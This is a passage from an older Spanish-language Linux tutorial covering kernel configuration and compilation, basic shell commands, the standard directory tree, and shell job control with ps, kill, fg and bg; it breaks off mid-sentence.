  make menuconfig

        Iniciar un colorido programa muy agradable y bastante mas funcional
  que el make config a secas, para llevar a cabo la configuracion del kernel.

        Observar que su uso es bastante intuitivo; las opciones con un < >
  indican la posibilidad de modularizar; si en ella presionamos M la
  seleccionaremos como modulo. Si presionamos ESPACIO aparecer un * indicando
  que ser incluido en el kernel. Finalmente, si presionamos N lo
  deseleccionaremos.

        Las opciones marcadas con [ ] no son modularizables.

        Si Vd. es un fan de las X, entonces puede arrancar desde un xterm el
  script equivalente, ejecutando

  make xconfig

        Supongo (porque siempre lo ice con make menuconfig) que aparecer ante
  sus ojos un maravilloso y grafico programa de seleccion y configuracion del
  kernel bajo X Window .

        A continuacion describire las opciones que creo son mas importantes a
  tener en cuenta al momento de compilar de todos modos las que aqui no este
  comentadas y Ud. Desee conocer cualquiera de los metodos de configuracion
  usados tendra un acceso a ayuda.

        Emulacion de coprocesador (kernel math emulation): Si no tiene
  coprocesador matematico debe contestar `y' a esto.  Si tiene coprocesador y
  contesta `y' la emulacion ser instalada pero no usada; funcionar , pero le
  ocupar memoria innecesariamente. Ademas, he oido que la emulacion es lenta,
  lo que se traducir en unas pesadas X-Window.

        Soporte de discos IDE y MFM/RLL: Normalmente necesitar este soporte,
  pues es el de los discos habituales en los PCs. Este manejador no gestiona
  discos SCSI, para eso esta la opcion especifica que luego veremos. Ahora se
  le preguntar si quiere usar ``old disk-only'' y manejadores ``new IDE''.
  Tiene que elegir uno de ellos. La diferencia principal es que el nuevo (new
  IDE) maneja controladoras secundarias y CD-ROMs IDE/ATAPI, hasta cuatro
  dispositivos, pero ocupa 4 KB mas que el antiguo. Se supone que los nuevos
  manejadores mejoran tambien velocidad y fiabilidad, en especial si dispone
  de dispositivos EIDE.

        Soporte de redes (networking support): En principio, contestaria
  afirmativamente si la maquina estuviera en una red local o conectada a la
  Internet con SLIP/PPP. Sin embargo, muchos programas, como ocurre con el
  sistema XWindow, requieren el soporte de red, asi que lo mejor es contestar
  `y' siempre. Despues se le preguntar si quiere soporte TCP/IP: conteste
  afirmativamente aun no estando seguro.

        Limitar memoria a 16 Mb (Limit memory to low 16MB)

        Hay controladores de DMA en 386 con problemas para direccionar mas de
  16 MB de RAM. Conteste `y' en el caso (raro) de que tenga uno de estos.

        Comunicacion entre procesos System V (System V IPC): Sinceramente no
  se bien lo que es pero lei que no es recomendable desactivarlo.

        Tipo de procesador (Processor type): Deber elegir siempre la CPU que
  tenga (aunque la versin de 386 funcionar en todas las maquinas).

        Soporte SCSI (SCSI support): Si tiene dispositivos SCSI, conteste
  `y'. Se le preguntaran entonces mas cosas: soporte de CD-ROM, discos y que
  clase de adaptador utiliza.

        Soportes de tarjetas de red (Network device support): Si tiene
  tarjeta de red, o quiere usar PPP, SLIP o PLIP (puerto paralelo usado para
  conectarse a Internet), conteste afirmativamente. El script le preguntara
  ahora que tarjeta tiene y que protocolo usar.

        Sistemas de ficheros (Filesystems): El programa le preguntara si
  quiere soporte para los siguientes sistemas de ficheros:

  * Standard (minix) - Las nuevas distribuciones no crean sistemas Minix, y
    mucha gente no las usa para nada, pero puede convenir elegirla. Algunos
    ``discos de rescate'' usan el sistema Minix como formato de sus disquetes,
    ya que da menos problemas.

  * Extended fs - Fue la primera version del sistema extendido, pero ya no se
    usa. No necesita seleccionarla.

  * Second extended - Este es el sistema mas usado. Seguramente lo usara Vd.
    tambien. Seleccione `y'. (Ojo con seleccionarlo como modulo; aunque se
    puede, el sistema de ficheros en el que este su particin "/" debe estar
    incluido el kernel no-modularmente, ya que de lo contrario no podra
    arrancar.)

  * xiafs filesystem - Hace mucho pudo ser usado, pero ahora mismo no.

  * msdos - Seleccionelo si quiere acceder desde Linux a sus particiones de
    MS-DOS o quiere montar disquetes de ese sistema.

  * umsdos - Este sistema permite aadir a un sistema MS-DOS las
    caracteristicas tipicas de Unix como nombres largos o enlaces. Sirve para
    quienes quieran instalar Linux en la particion DOS, pero nada mas.

  * /proc - (una idea robada descaradamente a Bell Labs, si no me equivoco)
    No se trata de algo que se guarde en el disco, sino de una interfaz por
    medio de ficheros con la tabla de procesos del nucleo, usada por
    programas como `ps'. Pruebe a teclear `cat /proc/meminfo' o
    `cat /proc/devices'. Algunos shells (rc, concretamente) hacen uso de
    /proc/self/fd (en lugar de /dev/fd) para E/S. Debe contestar
    afirmativamente a la pregunta: muchas utilidades de Linux lo necesitan.

  * NFS - Si su maquina esta en red y quiere acceder a sistemas de ficheros
    remotos con NFS, conteste `y' a esta pregunta.

  * ISO9660 - Tipico en los CD-ROMs. Si tiene un CD-ROM, seleccione esta
    opcion.

  * OS/2 HPFS - Para acceder a disco de OS/2. En el momento de escribir esto,
    el soporte HPFS es de solo lectura.

  * System V and Coherent - para particiones de sistemas Coherent y System V
    (otras variantes de Unix para PC). Conteste "no".

  * quota support - Seleccionelo si quiere administrar el espacio que
    consumen en disco los usuarios del sistema.

  * vfat - En conjuncion con el sistema de fichero fat o msdos nos permitira
    acceso a las particiones de w95, con soporte de nombres ``largos'' y
    demas. En el momento de escribir esto, se desconoce si soportar  la
    ``nueva'' fat32 del w95-OSR2.

  * SMB filesystem support - En conjuncion con el paquete samba nos permitir
    montar volumenes compartidos por clientes de red NetBios.

  * SMB w95 bug workaround - Corrije un bug que experimentan los volumenes
    exportados por servidores w95.

  * Amiga FFS support - Soporte para el sistema de ficheros Fast File System
    de Amiga.

  * UFS filesystem support - Soporte para el Unix FileSystem, empleado por
    algunos Unix BSD, como SunOS, FreeBSD, NetBSD, NeXTstep. Permite montar
    dichas particiones o disquetes en modo de solo lectura.

  * NCP filesystem support - Permite montar volumenes NetWare. Necesitar
    programas cliente para llevarlo a cabo.

        Pero. que sistemas de ficheros necesito! Teclee `mount'. La salida
  ser como esta:

  blah# mount
  /dev/hda1 on / type ext2 (defaults)
  /dev/hda3 on /usr type ext2 (defaults)
  none on /proc type proc (defaults)
  /dev/fd0 on /mnt type msdos (defaults)

        Observe cada linea; la palabra que sigue a `type' es el tipo de
  sistema usado. En este ejemplo, los sistemas raiz (/) y /usr usan el
  sistema ``second extended'', ademas usamos sistema ``proc'' y hay montado
  un disquete MS-DOS.

        Para saber que sistemas de ficheros usa en el nucleo actual puede
  teclear `cat /proc/filesystems' siempre y cuando tenga al menos soporte
  proc.

        Manejadores de tipo caracter (Character devices): Aqui se activan los
  manejadores para impresoras (por puerto paralelo), ratones de bus, ratones
  PS/2 (usado tambien en muchos trackballs de los portatiles), algunos
  manejadores de cintas y otros.  Conteste segun su hardware.

        Placa de sonido (Sound card): Si tiene placa de sonido conteste `y' y
  despues otro programa de configuracion le preguntara acerca de la tarjeta
  de sonido que tiene. Aqui es importante saber el puerto E/S, la IRQ, DMA de
  nuestra placa de Sonido.

        Otras opciones de configuracion: No todas las opciones se han listado
  ya que cambian mucho y otras son completamente evidentes (por ejemplo, el
  soporte 3Com 3C509).

        Kernel hacking: Traduccion del fichero README de Linus: La
  configuracin ``kernel hacking'' suele dar lugar a un nucleo mas grande y/o
  lento, y puede hacerlo menos estable al configurar algunas rutinas
  especiales para encontrar errores del nucleo. Deber  contestar `n' a la
  pregunta.

        El archivo Makefile

        Tras hacer make config, un mensaje le dira que ya esta preparado el
  kernel y que "revise el fichero Makefile para opciones adicionales".

        Por tanto, veamos el Makefile. Probablemente no tendra que cambiar
  nada, pero debe mirarse. Sus opciones podran cambiarse con el comando
  "rdev" una vez que el kernel este compilado.

        Compilacion del Kernel

        Limpieza y dependencias

        Cuando se termina de configurar debe ejecutar "make dep" y "make
  clean. Haga `make dep', lo que preparar  las dependencias en poco tiempo, a
  menos que su PC sea muy lento. Cuando acabe, haga "make  clean". Esto
  elimina ficheros objetos y demas de la version anterior. No olvidar este
  paso.

        La compilacion

        Despues de preparar dependencias, puede ejecutar "make zImage"(esta
  es la parte que tarda mas tiempo). `make zImage' compilar el nucleo y lo
  dejar comprimido en el subdirectorio arch/i386/boot/zImage junto a otros
  ficheros. La "z" inicial indica que el lo que obtenemos es una imagen
  comprimida del kernel, se descomprime automaticamente al ser ejecutado.

        Compilacion de Modulos

        Las ordenes make modules; make modules_install compilaran los modulos
  que hayamos seleccionado, y los instalaran. No olvidar ejecutar depmod -a
  en cuanto hayamos arrancado con dicho nucleo.

        Instalacion del Kernel nuevo

        La instalacion se hara en el directorio "/boot" si lo que instalamos
  es RedHat, en otro caso se la hace en "/". Veamos ahora como hacer esto:

  cd arch/i386/boot
  chmod 400 zImage
  rdev -R zImage 1
  cp zImage /boot/nuevokernel

        Solo nos resta retocar el archivo lilo.conf que se encuentra en el
  directorio /etc.

        #CAPITULO IV

        USO

        Conceptos basicos preliminares

        Para entender mejor Linux muchas veces haremos comparaciones con DOS,
  asi que aqui van algunas consideraciones acerca de MS-DOS o Linux. Muchos
  usuarios de Linux confian en MS-DOS para aplicaciones tales como
  procesadores de texto. Aunque Linux proporciona sus propios an logos para
  estas aplicaciones (por ejemplo, TEX), existen varias razones por las que
  un usuario concreto desearia correr tanto MS-DOS como Linux. Hay muchas
  aplicaciones comerciales para MS-DOS que no estan disponibles tidavia para
  Linux, y no hay ninguna razon por la que no pueda usar ambos.

        Como puede saber, MS-DOS no utiliza completamente la funcionalidad de
  los procesadores 80386 y 80486. Por otro lado, Linux corre completamente en
  el modo protegido del procesador y explota todas las caracteristicas del
  este. Puede acceder directamente a toda su memoria disponible (e incluso
  mas haya de la disponible, usando RAM virtual). Linux proporciona un
  interface UNIX completo no disponible bajo MS-DOS el desarrollo y
  adaptacion de aplicaciones UNIX bajo Linux es cosa facil, mientras que,
  bajo MS-DOS, Ud. esta limitado a un pequeo subgrupo de la funcionalidad de
  programacion UNIX. Al ser Linux un verdadero sistema UNIX, Ud. no tendria
  estas limitaciones.

        Podriamos debatir los pros y contras de MS-DOS y Linux durante
  paginas y paginas. Sin embargo, baste decir que Linux y MS-DOS son
  entidades completamente diferentes. MS-DOS no es caro (comparado con otros
  sistemas operativos comerciales), y tiene un fuerte asentamiento en el
  mundo de los PC's. Ningun otro sistema operativo para PC ha conseguido el
  nivel de popularidad de MS-DOS, basicamente porque el coste de esos otros 
  sistemas operativos es inaccesible para la mayoria de los usuarios de PCs.
  Muy pocos usuarios de PC pueden imaginar pagar lo que cuesta por ejemplo un
  Solaris. Linux, sin embargo, es gratis.

        Podra emitir sus propios juicios de Linux y MS-DOS basados en sus
  expectativas y necesidades. Linux no esta destinado a todo el mundo.

        Este capitulo no presentara gran cantidad de detalles ni cubriria
  temas muy avanzados. Sino que esta pensado para permitir al nuevo usuario
  de Linux comenzar a usar el sistema y situarlo en una posicion en la que
  pueda leer libros mas generales sobre UNIX y entender las diferencias
  basicas entre otros sistemas UNIX y Linux.

        A primera vista, UNIX parece como MS-DOS (despues de todo, partes de
  MS-DOS fueron tomadas de CP/M, el cual fue a su vez inspirado en UNIX
  incluso muchas de las novedades que Windows 95 pretende presentar son
  caracteristicas de los sistemas UNIX). Pero, solo las caracteristicas
  superficiales de UNIX se parecen a MS-DOS.

        Como ya dijimos, Linux es un sistema operativo multitarea y
  multiusuario. Bajo UNIX, para que los usuarios puedan identificarse en el
  sistema, deben registrarse (login), proceso que consta de dos pasos:
  Introducir el nombre de usuario (login) (el nombre con que ser
  identificado por el sistema), y una palabra clave o contrasea (password),
  la cual es su llave personal secreta para entrar en la cuenta. Como solo
  usted conoce su palabra clave, nadie mas podra logearse en el sistema con
  su nombre de usuario. Por esto es muy importante tomarse unos minutos para
  elegir una palabra clave que no sea facil de adivinar o desencriptar, es
  comun en los novatos usar palabras claves que tiene algo que ver con ellos,
  por ejemplo el nombre de la esposa, madre, hija, fecha de nacimiento,
  numero de documento, hasta el nombre de su mascota, de esta manera los
  hacker usan diccionarios con (por ejemplo) nombres comunes de mascotas para
  lograr adivinar claves de usuarios desprevenidos.
 
        En los sistemas UNIX tradicionales, el administrador del sistema
  asignara el nombre de usuario y una palabra clave inicial en el momento de
  crear la cuenta de usuario.

        Ademas, cada sistema UNIX tiene un nombre del sistema (hostname. Este
  "hostname" le da nombre a la maquina, ademas de caracter y encanto, por
  ejemplo la mia se llama Tesla, la anterior fue Newton y la anterior
  Leonardo. El nombre del sistema es usado para identificar maquinas en una
  red, pero incluso aunque la maquina no este en red, deberia tener un nombre.

        Antes de poder usar el sistema, deber crear una cuenta de usuario.
  Esto es necesario porque no es buena idea usar la cuenta de root para los
  usos normales. La cuenta de root deberia reservarse para el uso de comandos
  privilegiados y para el mantenimiento del sistema.

        Shells

        La forma de comunicarse entre el S.O., el hardware y el usuario es un
  Shell, en Linux, el mas difundido es "bash" que significa "Bourne again
  shell" aunque existen varios shells para todos los gustos. En la mayoria de
  las exploraciones en el mundo de UNIX, estar hablando con el sistema a
  traves del uso de un shell. Un shell es simplemente un programa que toma la
  entrada del usuario (ej. las ordenes que teclea) y las traduce a
  instrucciones. Esto puede ser comparado con el COMMAND.COM de MS-DOS o el
  4DOS para los mas exquisitos, los cuales  efectuan esencialmente la misma
  tarea. El shell es solo uno de los interfaces con UNIX hay muchos
  interfaces posibles como el sistema X Windows, el cual le permite ejecutar
  comandos usando el raton y el teclado.

        Antes de continuar, deberiamos ver como salir del sistema. Desde la
  linea de comandos usaremos la orden "exit" para salir. Hay otras formas,
  pero esta es la mas facil.

        Directorios

        La mayoria de los sistemas UNIX tienen una distribucion de ficheros
  estandar, de forma que recursos y ficheros puedan ser facilmente
  localizados. Esta distribucion forma el arbol de directorios, el cual
  comienza en el directorio "/", tambien conocido como "directorio raiz".
  Directamente por debajo de "/" hay algunos subdirectorios importantes:
  /bin, /etc, /dev y /usr, entre otros. Estos a su vez contienen otros
  directorios con ficheros de configuracion del sistema, programas, etc. En
  particular, cada usuario tiene un directorio "home". Este es el directorio
  en el que el usuario guardara sus archivos. Usualmente, los directorios
  home de los usuarios cuelgan de /home y son nombrados con el nombre del
  usuario al que pertenecen.

  El siguiente es un ejemplo de arbol de directorios en linux.

  /________bin
        |
        |__dev
        |
        |__etc
        |
        |__home_______juan
        |          |
        |          |__pedro
        |__lib
        |  
        |__proc
        |
        |__tmp
        |          
        |__usr_______X386
                  |
                  |__bin
                  |
                  |__emacs
                  |
                  |__etc
                  |  
                  |__g++-include
                  |
                  |__include
                  |
                  |__lib
                  |
                  |__local_______bin
                  |           |  
                  |           |__emacs
                  |           |
                  |           |__etc
                  |           |
                  |           |__lib
                  |
                  |__man
                  |  
                  |__spool
                  |
                  |__src_______linux
                  |
                  |__tmp
                 
        Comandos Basicos

        Antes de comenzar es importante destacar que todos los nombres de
  ficheros y comandos son "case-sensitive" (que hacen diferencia entre
  mayusculas y minusculas, a diferencia de sistemas operativos como MS-DOS).
  Por ejemplo, el comando make es diferente a Make o MAKE. Lo mismo ocurre en
  el caso de nombres de ficheros o directorios.

        Cambio de directorio:

        La orden para movernos por la estructura de directorios es cd,
  abreviacion de "cambio de directorio". Hay que destacar, que la mayoria de
  las ordenes UNIX mas usadas son de dos o tres letras.

        La forma de uso de la orden cd es:

  cd <directorio>

        donde <directorio> es el nombre del directorio al que queremos ir. Si
  usamos cd sin par metros esto no llevara a nuestro directorio. Tenemos
  tambien dos puntero uno al directorio padre ".." y otro a si mismo "." Esto
  tambien fue copiado por DOS.

        Consultar el directorio actual

        Para saber en que directorio no escontramos usaremos el comando "pwd"

        Consultar el contenido de los directorios

        Una vez que podemos navegar por nuestro arbol de directorio lo mas
  importantes es poder ver que tenemos en cada uno. Para eso usaremos el
  comando "ls", ls vendria a ser "dir" del DOS, pero como vernos mas adelante
  es mucho mas poderoso como todos los comandos de Linux. Ls tiene muchos
  parametros que van a afectar su comportamiento a todos pero el mas usado
  sin duda ser "-l" que no mostrara con mas detalle el contenido del
  directorio.

        Consultar las paginas del manual

        En este momento creo que uno de los comandos que mas nos van a ayudar
  en el aprendizaje de Linux es "man" que siguiendo con las comparaciones con
  el DOS vendria a ser el "help" con man podremos solicitar informacion de
  todos los comandos e incluso algunos programas y aplicaciones tiene sus
  propias paginas de manual. En mi experiencia personal man me ayudo mas
  veces que cualquier libro.

        La forma de usarlo es:

  man <comando>

        Creacion de directorios:

        Para esto usaremos el comando "mkdir" como en DOS seguido del nombre
  del directorio a crear.
	
  mkdir <nombre>

        Copiado de archivos

        La orden "cp" copia los ficheros listados en la linea de comandos al
  fichero o directorio pasado como ultimo argumento. Notese como se usa el
  directorio "." para referirnos al directorio actual.

  cp <origen> <destinod>

        Mover archivos

        Tanto para mover como para renombrar archivos o directorio usaremos
  el comando "mv" de identica manera a "cp" solo que en esta caso no se
  preservara el origen.

  mv <origen> <destinod>

        Borrado de archivos
        
        Para borrar se usa "rm" que viene de remove. Se usa con un parametro
  que es el nombre del fichero a borrar o una lista de ellos. Tambien lo
  podemos usar para borrar directorios completos con el parametro "-r" a hay
  que ser muy prudente y cuidadoso con este comando ya que podemos hacer
  macanas.

  rm <nombre de archivo o directorio>

        Mirando los ficheros

        Las ordenes "more", "cat" y "less" son usadas para ver el contenido
  de ficheros. More y less muestran el fichero pantalla a pantalla mientras
  que cat lo muestra entero de una vez.

  more <archivo>
  less <archivo>
  cat <archivo>

        El sistema de ficheros es la coleccion de ficheros y la jerarquia de
  directorios de su sistema.

        Primero cambie al directorio raiz (cd /) y ejecute ls -F.
  Probablemente vera estos directorios:

  bin, dev, etc, home, install, lib, mnt, proc, root, tmp, user, usr, y var.

        La distribucion de directorios y archivos es Unix es muy ordenada y
  distinta que en DOS, veamos para que usamos cada directorio.

  Directorio
  Contenido

  /bin
  /bin Es la abreviacion de "binaries", o ejecutables.  Es donde residen la
       mayoria de los programas esenciales del sistema.

  /dev
  /dev Los "ficheros" en /dev son conocidos como controladores de dispositivo
       (device drivers)_son usados para acceder a los dispositivos del
       sistema y recursos, como discos duros, modems, memoria, etc

  /etc
  /etc Contiene una serie de ficheros de configuracion del sistema. Estos
       incluyen /etc/passwd (la base de datos de usuarios), /etc/rc (guiones
       de inicializacion del sistema), etc.

  /sbin
  /sbin Se usa para almacenar programas esenciales del sistema, que usara el
        administrador del sistema.

  /home
  /home Contiene los directorios "home" de los usuarios. Por ejemplo,
        /home/juan es el directorio del usuario "juan".

  /lib
  /lib Contiene las imagines de las librerias compartidas. Estos ficheros
       contienen codigo que compartirian muchos programas.

  /proc
  /proc Es un "sistema de ficheros virtual". Los ficheros que contiene
        realmente residen en memoria, no en un disco. Hacen referencia a
        varios procesos que corren en el sistema, y le permiten obtener
        informacion acerca de que programas y procesos estan en ejecucion.

  /usr
  /usr Es un directorio muy importante. Contienen una serie de subdirectorios
       que contienen a su vez algunos de los mas importantes y utiles
       programas y ficheros de configuracion usados en el sistema.

  /usr/X386
  /usr/X386 Contiene todos los ejecutables de X Window, ficheros de
            configuracion y de soporte.

  /usr/bin
  /usr/bin Es el deposito real de programas del sistema UNIX. Contiene la
           mayoria de los programas que no se encuentran en otras partes como
           /bin.

  /usr/include
  /usr/include Contiene los ficheros de cabecera para el compilador de C.
               Estos ficheros (la mayoria de los cuales terminan en .h, de
               "header") declaran estructuras de datos, subrutinas y
               constantes usados en la escritura de programas en C. Los
               ficheros que se encuentran en /usr/include/sys son
               generalmente usados en la programacion de en UNIX a nivel de
               sistema. Si esta familiarizado con el lenguaje de programacion
               C, aqui encontrara los ficheros de cabecera como stdio.h, el
               cual declara funciones como printf().

  /usr/local
  /usr/local Es el directorio donde normalmente pondremos nuestras
             aplicaciones.

  /usr/src
  /usr/src Contiene el codigo fuente (programas por compilar) de varios
           programas de su sistema. El mas importante es /usr/src/linux, el
           cual contiene el codigo fuente del kernel de Linux.

  /var
  /var Contiene directorios que a menudo cambian su tamao o tienden a
       crecer. Muchos de estos directorios solian residir en /usr, por
       ejemplo en /var/adm encontraremos varios ficheros de interes para el
       administrador del sistema, especificamente histricos del sistema, los
       cuales recogen errores o problemas con el sistema.

        #Capitulo V

        Control de Tareas

        Tareas y procesos

        Control de Tareas es una utilidad incluida en muchos shells
  (incluidas Bash y Tcsh), que permite el control de multitud de comandos o
  tareas al momento.  Antes de seguir, deberemos hablar un poco sobre los
  procesos.

        Cada vez que usted ejecuta un programa, usted lanza lo que se conoce
  como proceso, que es simplemente el nombre que se le da a un programa
  cuando se esta ejecutando. El comando ps visualiza la lista de procesos que
  se estan ejecutando actualmente, por ejemplo:

  /home/jperez# ps

  PID TT STAT  TIME COMMAND
  24  3 S      0:03 (bash)
  161  3 R      0:00 ps

        La columna PID representa el identificador de proceso. La ultima
  columna COMMAND, es el nombre del proceso que se esta ejecutando. Ahora
  solo estamos viendo los procesos que esta ejecutando jperez. Vemos que hay
  dos procesos, bash (Que es el shell o interprete de comandos que usa
  jperez), y el propio comando ps. Como puede observar, bash se ejecuta
  concurrentemente con el comando ps. Bash ejecuto ps cuando jperez tecleo el
  comando. Cuando ps termina de ejecutarse (despues de mostrar la tabla de
  procesos), el control retorna al proceso bash, que muestra el prompt,
  indicando que esta listo para recibir otro comando. Un proceso que esta
  corriendo se denomina tarea para el shell. Los terminos proceso y tarea,
  son sinonimos. Sin embargo, se suele denominar "tarea" a un proceso, cuando
  es usado en conjuncion con control de tareas, que es un rasgo del shell que
  permite cambiar entre distintas tareas.

        Hay muchos mas procesos aparte de estos corriendo en el sistema, para
  verlos todos, teclearemos el comando "ps -aux".

        En muchos casos, los usuarios solo ejecutan un trabajo cada vez, que
  es el ultimo comando que ellos teclearon desde el shell. Sin embargo,
  usando el control de tareas, usted podra ejecutar diferentes tareas al
  mismo tiempo, cambiando entre cada uno de ellos conforme lo necesite.
  Supongamos que esta usando un procesador de textos, y de repente necesita
  parar y realizar otra tarea, con el control de tareas, usted podria
  suspender temporalmente el editor, y volver al shell para realizar
  cualquier otra tarea, y luego regresar al editor como si no lo hubiese
  dejado nunca. Lo siguiente solo es un ejemplo, hay montones de usos
  practicos del control de tareas.

        Primer plano y Segundo plano

        Un proceso puede estar en Primer plano o en Segundo plano
  (background). Solo puede haber un proceso en primer plano por vez, el
  proceso que esta en primer plano, es el que interactua con usted, recibe
  entradas de teclado, y envia las salidas al monitor. (Salvo, por supuesto,
  que haya redirigido la entrada o la salida. El proceso en segundo plano, no
  recibe ninguna seal desde el teclado por lo general, se ejecutan en
  silencio sin necesidad de interaccion.

        Algunos programas necesitan mucho tiempo para terminar, y no hacen
  nada interesante mientras tanto. Compilar programas es una de estas tareas,
  asi como comprimir un fichero grande. No tiene sentido que se siente y se
  aburra mientras estos procesos terminan. En estos casos es mejor lanzarlos
  en segundo plano, para dejar el ordenador en condiciones de ejecutar otro
  programa.

        Los procesos pueden ser suspendidos. Un proceso suspendido es aquel
  que no se esta ejecutando actualmente, sino que esta temporalmente parado.
  Despues de suspender una tarea, puede indicar a la misma que continue, en
  primer plano o en segundo, segun necesite. Retomar una tarea suspendida no
  cambia en nada el estado de la misma la tarea continuara ejecutandose justo
  donde se dejo.

        Tenga en cuenta que suspender un trabajo no es lo mismo que
  interrumpirlo. Cuando usted interrumpe un proceso (generalmente con la
  pulsacin de |ctrl-C|, el proceso muere, y deja de estar en memoria y
  utilizar recursos del ordenador. Una vez eliminado, el proceso no puede
  continuar ejecutandose, y deber ser lanzado otra vez para volver a realizar
  sus tareas. Tambien se puede dar el caso de que algunos programas capturan
  la interrupcion, de modo que pulsando |ctrl-C| no se para inmediatamente.
  Esto se hace para permitir al programa realizar operaciones necesarias de
  limpieza antes de terminar. De hecho, algunos programas simplemente no se
  dejan matar por ninguna interrupcin.

        Envio a segundo plano y eliminacion procesos

        Empecemos con un ejemplo sencillo. El comando yes es un comando
  aparentemente inutil que envia una serie interminable de y-es a la salida
  estandar. (En realidad es muy util. Si se utiliza una tuberia (o "pipe")
  para unir la salida de y-es con otro comando que haga preguntas del tipo
  si/no, la serie de y-es confirmaria todas las preguntas.)

  /home/jperez# yes
  y
  y
  y
  y
  y |ctrl-C|

        La serie de y-es continuara hasta el infinito, a no ser que usted la
  elimine, pulsando la tecla de interrupcion. Tambien puede deshacerse de
  esta serie de y-es redigiriendo la salida estandar de yes hacia /dev/null,
  que es como una especie de "agujero negro" o papelera para los datos. Todo
  lo que usted envie alli, desaparecer: /home/jperez# yes > /dev/null. Ahora
  va mucho mejor, el terminal no se ensucia, pero el prompt de la shell no
  retorna. Esto es porque yes sigue ejecutandose y enviando esos inutiles
  y-es a /dev/null.  Para recuperarlo, pulse la tecla de interrupcion.

        Supongamos ahora que queremos dejar que el comando yes siga
  ejecutandose, y volver al mismo tiempo a la shell para trabajar en otras
  cosas. Para ello enviaremos a yes a segundo plano, lo que nos permitir
  ejecutarlo, pero sin necesidad de interaccion.

        Una forma de mandar procesos a segundo plano es aadiendo un caracter
  "&" al final de cada comando.

  /home/jperez# yes > /dev/null &
  [1] 164

        Como podra ver, ha regresado a la shell. Pero que es eso de
  "[1] 164"?, Se esta ejecutando realmente el comando yes?. "[1]" representa
  el numero de tarea del proceso yes. La shell asigna un numero a cada tarea
  que se este ejecutando. Como yes es el unico comando que se esta ejecutando,
  se le asigna el numero de tarea 1. El numero "164" es el numero de
  identificacion del proceso, o PID, que es el numero que el sistema le
  asigna al proceso. Ambos numeros pueden usarse para referirse a la tarea
  como veremos despues.

        Ahora usted tiene el proceso yes corriendo en segundo plano, y
  enviando constantemente la seal y hacia el dispositivo /dev/null. Para
  chequear el estado del proceso, utilice el comando interno de la shell
  jobs:

  /home/jperez# jobs
  [1]+  Running                   yes >/dev/null  &

        Tambien puede usar el comando ps, como mostramos antes, para
  comprobar el estado de la tarea.

        Para eliminar una tarea, utilice el comando kill. Este comando toma
  como argumento un numero de tarea o un numero de ID de un proceso. Esta era
  la tarea 1, asi que usando el comando

  /home/jperez# kill %1

        matar la tarea. Cuando se identifica la tarea con el numero de tarea,
  se debe preceder el numero con el caracter de porcentaje ("%").

        Ahora que ya hemos matado la tarea, podemos usar el comando jobs de
  nuevo para comprobarlo:

  /home/jperez# jobs
  [1]+  Terminated                yes >/dev/null

        La tarea esta , en efecto, muerta, y si usa el comando jobs de nuevo,
  no mostrar nada.

        Tambien podra matar la tarea usando el numero de ID de proceso (PID),
  el cual se muestra conjuntamente con el ID de tarea cuando arranca la misma.
  En nuestro ejemplo el ID de proceso es 164, asi que el comando

  /home/jperez# kill 164

        es equivalente a

  /home/jperez# kill %1

        No es necesario usar el "%" cuando nos referimos a una tarea a traves
  de su ID de proceso.

        Detencion o parada y relanzamiento de tareas

        Hay otra manera de poner una tarea en segundo plano. Usted puede
  lanzarlo como un proceso normal (en primer plano), pararlo, y despues
  relanzarlo en segundo plano.

        Primero, lance el proceso yes en primer plano como lo haria
  normalmente:

  /home/jperez# yes > /dev/null

        De nuevo, dado que yes corre en primer plano, no debe retornar el
  prompt de la shell.

        Ahora, en vez de interrumpir la tarea con |ctrl-C|, suspenderemos la
  tarea. El suspender una tarea no la mata: solamente la detiene
  temporalmente hasta que Ud. la retoma. Para hacer esto usted debe pulsar la
  tecla de suspender, que suele ser |ctrl-Z|.

  /home/jperez# yes > /dev/null

  |ctrl-Z|
  [1]+  Stopped                   yes >/dev/null
  /home/jperez#

        Mientras el proceso esta suspendido, simplemente no se esta
  ejecutando. No gasta tiempo ni recursos del sistema en la tarea. Sin
  embargo, usted puede retomar el proceso de nuevo como si nada hubiera
  pasado. Continuara ejecutandose donde se dejo. Para relanzar la tarea en
  primer plano, use el comando fg (del ingles "foreground").

  /home/jperez# fg yes >/dev/null

        La shell muestra el nombre del comando de nuevo, de forma que tenga
  conocimiento de que tarea es la que ha puesto en primer plano. Pare la
  tarea de nuevo, con |ctrl-Z|. Esta vez utilice el comando bg para poner la
  tarea en segundo plano. Esto hara que el comando siga ejecutandose igual
  que si lo hubiese hecho desde el principio con "&"

  /home/jperez# bg
  [1]+ yes >/dev/null &
  /home/jperez#

        Y tenemos de nuevo el prompt. El comando jobs deberia decirnos que
  yes se esta ejecutando, y podemos matar la tarea con kill tal y como lo
  hicimos antes.

        Como podemos parar la tarea de nuevo?  Si pulsa |ctrl-Z| no
  funcionara, ya que el proceso est  en segundo plano. La respuesta es poner
  el proceso en primer plano de nuevo, con el comando fg, y entonces pararlo.
  Como puede observar podr  usar fg tanto con tareas detenidas, como con las
  que esten segundo plano.

        Hay una gran diferencia entre una tarea que se encuentra en segundo
  plano, y una que se encuentra detenida. Una tarea detenida es una tarea que
  no se esta ejecutando, es decir, que no usa tiempo de CPU, y que no esta
  haciendo ningun trabajo (la tarea aun ocupa un lugar en memoria, aunque
  puede ser volcada a disco). Una tarea en segundo plano, se esta ejecutando,
  y usando memoria, a la vez que completando alguna accion mientras usted
  hace otro trabajo. Sin embargo, una tarea en segundo plano puede intentar
  mostrar texto en su terminal, lo que puede resultar molesto si esta
  haciendo hacer otra cosa. Por ejemplo, si usted uso el comando

  /home/jperez# yes &

        sin redirigir stdout a /dev/null, una cadena de y-es se mostrar en su
  monitor, sin que pueda interrumpirlo (no puede hacer uso de |ctrl-C| para
  interrumpir tareas en segundo plano). Para poder parar esas interminables
  y-es, tendria que usar el comando fg para pasar la tarea a primer plano, y
  entonces usar |ctrl-C| para matarla. Otra observacion. Normalmente, los
  comandos "fg" y "bg" actuan sobre el ultimo proceso parado (indicado por un
  "+" junto al numero de tarea cuando usa el comando jobs). Si usted tiene
  varios procesos corriendo a la vez, podria mandar a primer o segundo plano
  una tarea especifica indicando el ID de tarea como argumento de fg o bg,
  como en /home/jperez# fg %2 (para la tarea de primer plano numero 2), o
  /home/jperez# bg %3
        (Para la tarea de segundo plano numero 3). No se pueden usar los ID
  de proceso con fg o bg. Ademas de esto, si usa el numero de tarea por si
  solo, como /home/jperez# %2

        es equivalente a

  /home/jperez# fg %2

        Solo queda recordarle que el uso de control de tareas es una utilidad
  de la shell. Los comandos fg, bg y jobs son internos de la shell. Si por
  algun motivo usted utiliza una shell que no soporta control de tareas, no
